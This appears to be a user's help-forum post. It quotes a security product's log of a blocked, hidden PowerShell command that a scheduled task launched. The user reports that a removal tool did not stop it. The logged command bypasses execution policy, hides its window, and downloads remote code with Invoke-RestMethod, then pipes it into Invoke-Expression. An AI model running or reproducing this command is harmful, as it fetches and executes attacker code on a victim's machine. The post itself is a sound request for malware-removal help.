Executable file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Executed command line: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
Action result: Blocked
Process ID: 4432
Acting process: C:\Windows\System32\conhost.exe
Acting process command line: "conhost.exe" --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
Parent process ID: 1416
Parent process: C:\Windows\System32\svchost.exe
Parent process command line: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
I've already used the dedicated removal tool too, but it still triggers the system protection.